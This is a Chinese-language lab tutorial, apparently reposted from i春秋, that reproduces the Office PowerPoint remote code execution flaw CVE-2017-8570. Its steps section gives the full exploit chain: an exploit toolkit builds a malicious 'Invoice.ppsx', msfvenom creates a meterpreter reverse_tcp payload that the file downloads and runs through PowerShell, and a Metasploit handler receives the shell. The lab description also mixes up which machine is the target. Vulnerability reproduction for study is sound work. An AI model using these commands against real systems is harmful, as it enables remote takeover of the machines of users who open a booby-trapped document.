CVE-2017-8570漏洞復現與漏洞利用

CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm(沙蟲)漏洞非常類似,因此我們稱之為「沙蟲」二代漏洞:Office全家桶

0x00 實驗環境

  • 操作機:windows7 x64
  • IP:172.16.11.2
  • 目標機:Kali Linux
  • IP:172.16.12.2

0x01 漏洞介紹

OfficeCVE-2017-85702017年7月,微軟在例行的閱讀補丁中修復了多個Microsoft Office漏洞,其中的CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單。網上公布了利用代碼影響範圍廣泛。該漏洞為Microsoft Office的一個遠程代碼執行漏洞。

其成因是Microsof PowerPoint執行時會初始化「script」Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows script Component)文件。可以欺騙用戶運行含有該漏洞的PPT文件導致獲取和當前登錄用戶相同的執行許可權。

0x02 影響版本

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)

0x03 實驗步驟

1.生成惡意ppsx文件xshell連接kali主機

在kali下執行如下命令:

cd CVE-2017-8570 //進入exploit的目錄

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc //生成ppsx惡意文件

使用ls命令,可以看到已經成功生成了ppsx格式文件。

接下來將生成的惡意ppsx文件,通過調用powershell下載並執行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe

其中 -p 參數是 payload的意思,是使用windows的meterpreter的反彈文件-f參數 指定輸出文件後綴為exe文件再用>重定向輸出到tmp目錄下

接下來輸入如下命令:

python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe

這段命令是通過腳本在80埠監聽,等待接收ppsx請求並下載執行我們的反彈文件

接下來進入Metasploit,新建一個Kali`172.16.12.2的連接,設置相關參數,接受返回的Shell

msfconsole
use multi/handler //使用監聽模塊
set payload windows/meterpreter/reverse_tcp //設置Payload
set LHOST 172.16.12.2 //設置本地接收IP
run

可以看到我們的Metaspliot已經在本地開啟監聽

到此我們的所有準備都做好,下一步我們模擬用戶點擊惡意文件

2.目標機器執行惡意ppsx文件

我們使用桌面Xftp軟體,用戶名、密碼是root,123456,使用sftp連接方式,連接上目標機172.16.12.2,將Invoice.ppsx雙擊打開

執行過程中可以看到代碼通過調用powershell在遠程下載執行我們的惡意文件,此時已經反彈回了shell

執行命令:

getuid //獲取當前用戶ID

這樣就獲取了目標機器的許可權,可以通過Metasploit去執行命令。

0x04 總結

Office一直是主流的辦公軟體,CVE-2017-8570這個漏洞影響office所有發行版本,當用戶不經意點擊了我們的惡意PPSX文件,那麼我們就可以直接獲取到他的用戶許可權,可以看到危害性十足。

參考來源:i春秋

Office遠程代碼執行漏洞(CVE-2017-8570)_視頻教程_i春秋_培育信息時代的安全感!


推薦閱讀:

TAG:漏洞挖掘 | 漏洞 | 黑客(Hacker) |